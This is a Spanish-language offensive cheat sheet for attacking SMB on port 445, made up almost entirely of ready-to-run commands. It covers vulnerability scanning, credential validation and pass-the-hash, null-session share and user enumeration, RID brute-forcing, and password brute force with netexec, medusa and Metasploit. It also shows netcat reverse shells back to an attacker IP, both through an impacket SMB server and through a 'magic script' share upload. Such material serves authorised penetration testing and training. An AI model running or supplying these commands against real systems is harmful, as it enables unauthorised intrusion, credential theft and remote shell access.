⚪ 445 - SMB (TCP)

Información

Server Message Block (SMB) es un protocolo de red que permite compartir archivos, impresoras entre nodos de una red de computadoras que usan el sistema operativo Microsoft Windows.

Puerto Estándar: `445`

PORT    STATE SERVICE
445/tcp open  mircosoft-ds

Si Nmap no obtiene el encabezado del servicio, consultará la DB IANA para determinar el servicio asociado al puerto.

Enumeración

Básica

Mediante una enumeración básica obtendremos información relacionada con el dominio, os, arquitectura y firma.

netexec smb 192.168.1.2

Normal

nmap -p445 -sS 192.168.1.2
nmap -p445 -sVC 192.168.1.2

Vulnerabilidades

nmap -p445 --script="smb-vuln*" 192.168.1.2
nmap -p445 --script="vuln and safe" 192.168.1.2
nmap -p445 --script="smb-enum-*" 192.168.1.2

Validar Credenciales

# password
netexec smb 192.168.1.2 -u administrator -p 'Passsword123!'
netexec smb 192.168.1.2 -u administrator -p 'Passsword123!' --local-auth
# hash
netexec smb 192.168.1.2 -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e'
netexec smb 192.168.1.2 -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e' --local-auth

Listar

Null Session

smbclient -NL //192.168.1.2

smbmap --no-banner -H 192.168.1.2
smbmap --no-banner -H 192.168.1.2 -u '' -p ''

netexec smb 192.168.1.2 --shares
netexec smb 192.168.1.2 -u '' -p '' --shares

Authenticated

netexec smb 192.168.1.2 --shares -u 'peter' -p 'rockyou'
smbclient -L //192.168.1.2 -U "peter%rockyou"
smbmap -H 192.168.1.2 -u 'peter' -p 'rockyou'

Acceder

Null Session

# null session
smbclient -N //192.168.1.2/server
# error -> protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED)
smbclient -N //192.168.1.2/server --option='client min protocol=NT1'

netexec smb 192.168.1.2 -u '' -p '' --spider server --regex .

smbmap -H 192.168.1.2 -u ' ' -p ' ' -r server

Authenticated

Password

smbclient //192.168.1.2/server -U "peter%rockyou"
netexec smb 192.168.1.2 -u 'peter' -p 'rockyou' --spider server --regex .
smbmap -H 192.168.1.2 -u 'peter' -p 'rockyou' -r server

Hash

pth-smbclient //192.168.1.2/server -U 'peter%00000000000000000000000000000000:3B4C57484504038C2F2E94861D507BA7'
pth-smbclient //192.168.1.2/server -p 3000 -U 'peter%00000000000000000000000000000000:3B4C57484504038C2F2E94861D507BA7'
smbclient //192.168.1.2/server -U peter --pw-nt-hash 'F9FE0310AF66C797A73CB60B1953FCD7'
smbclient //192.168.1.2/server -U peter --pw-nt-hash '3B4C57484504038C2F2E94861D507BA7' -p 3000

Levantar

Null Session

impacket-smbserver a . -smb2support
C:\victim\>copy \\192.168.1.2\a\nc.exe nc.exe
C:\victim\>\\192.168.1.2\a\nc.exe -e cmd 192.168.1.2 443

Authenticated

impacket-smbserver a . -smb2support -username hacker -password Password123
C:\victim\> net use x: \\192.168.1.2\a /user:hacker Password123
C:\victim\> dir x:\
C:\victim\> copy x:\nc.exe nc.exe

File Transfer

# upload
smb: \> put cmd.php
# download
smb: \> get config.php

smbmap -H 192.168.1.2 --download SYSVOL/Groups/Groups.xml
smbmap -H 192.168.1.2 -u admin -p Passw0rd123! --download 'users$/mhope/azure.xml'
smbmap -H 10.129.228.253 -u 'guest' -p '' --download Public/'SQL Server Procedures.pdf'

smbclient -N //192.168.1.2/folder
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

netexec smb 10.129.228.253 -u 'guest' -p '' --share Public --get-file "SQL Server Procedures.pdf" "SQLServerProcedures.pdf"

smbget -R smb://192.168.1.2/folder$ -U "usuario"
smbget -R smb://192.168.1.2/folder$ -U "usuario%password"

Users

netexec smb 192.168.1.2 --users

enum4linux 192.168.1.2
enum4linux 192.168.1.2 -u 'hope' -p 'loser'
enum4linux -U 192.168.1.2

RPC

# null session
rpcclient -NU "" 192.168.1.2 -c "enumdomusers"
rpcclient -NU "" 192.168.1.2 -c "enumdomusers" | grep -oP '\[.*?\]' |tr -d '[]' |grep -v '0x' > users.dic
rpcclient -NU "" 192.168.1.2 -c "querydispinfo and enumdomusers"
rpcclient -NU "" 192.168.1.2 -c "querydispinfo and enumdomusers" | awk '{print $8}'

RIDs

Linux

netexec smb 192.168.1.2 --rid-brute

# range
rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupnames root'
# default port
for i in $(seq 1000 1005); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupsids S-1-22-1-$i'" ;done
# other port
for i in $(seq 1000 1005); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -p 1234 -c 'lookupsids S-1-22-1-$i'" ;done

Windows

netexec smb 192.168.1.2 --rid-brute

# range
rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupnames administrator'
rpcclient -U 'administrator%Password123' 192.168.1.2 -c 'lookupnames administrator'
# default port
for i in $(seq 500 1150); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupsids S-1-5-21-172782897-4107608896-4177437455-$i'" ;done | grep -v "unknown"
for i in $(seq 500 1150); do bash -c "rpcclient -W '' -U 'administrator'%'Password123' 192.168.1.2 -c 'lookupsids S-1-5-21-172782897-4107608896-4177437455-$i'" ;done | grep -v "unknown"
for i in $(seq 500 1150); do bash -c "rpcclient -W '' -U 'administrator'%'Password123' 192.168.1.2 -c 'lookupsids S-1-5-21-172782897-4107608896-4177437455-$i'" ;done | grep -vE "unknown|\(2\)|\(4\)"

Brute Force

netexec smb 192.168.1.2 -u peter -p rockyou.txt
netexec smb 192.168.1.2 -u peter -p rockyou.txt --local-auth
netexec smb 192.168.1.2 -u peter -p rockyou.txt --continue-on-success

medusa -h 192.168.1.2 -u peter -P rockyou.txt -M smbnt -v 4 -f
medusa -h 192.168.1.2 -u peter -P rockyou.txt -t 10 -M smbnt -v 4 -f
medusa -h 192.168.1.2 -u peter -P rockyou.txt -t 10 -M smbnt -v 4 -f 2>/dev/null

Metasploit

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOST 192.168.1.2
msf6 auxiliary(scanner/smb/smb_login) > set SMBuser peter
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set VERBOSE false
msf6 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/smb/smb_login) > set THREADS 10
msf6 auxiliary(scanner/smb/smb_login) > run

Magic Script

Si tenemos acceso a un share y en el existe definido un Magic Script, podemos cargar un script con el mismo nombre con una reverse shell y será interpretado por el usuario que levanta el servicio SMB obteniendo una shell

Contenido del archivo smb.conf donde carga el Magic Script llamado config.sh

[tmp]
    comment = Temp Directory
    browseable = yes
    valid users = xerosec
    read only = no
    magic script = config.sh
    create mask = 0700
    directory mask = 0700
    path = /tmp/

Generar un script con el mismo nombre config.sh y subir al share

❯ cat config.sh
busybox nc 192.168.1.10 443 -e /bin/sh

smb: \> put config.sh

❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.95] 60482
id ; hostname 
uid=1000(xerosec) gid=1000(xerosec) grupos=1000(xerosec)
magic

⚪ 445 - SMB (TCP)

⚪ 445 - SMB (TCP)

Información

Puerto Estándar: `445`

Enumeración

Básica

Normal

Vulnerabilidades

Validar Credenciales

Shares

Listar

Null Session

Authenticated

Acceder

Null Session

Authenticated

Password

Hash

Levantar

Null Session

Authenticated

File Transfer

Users

RPC

RIDs

Linux

Windows

Brute Force

Metasploit

Magic Script

results matching ""

No results matching ""

⚪ 445 - SMB (TCP)

Información

Puerto Estándar: 445

Enumeración

Básica

Normal

Vulnerabilidades

Validar Credenciales

Shares

Listar

Null Session

Authenticated

Acceder

Null Session

Authenticated

Password

Hash

Levantar

Null Session

Authenticated

File Transfer

Users

RPC

RIDs

Linux

Windows

Brute Force

Metasploit

Magic Script

results matching ""

No results matching ""

Puerto Estándar: `445`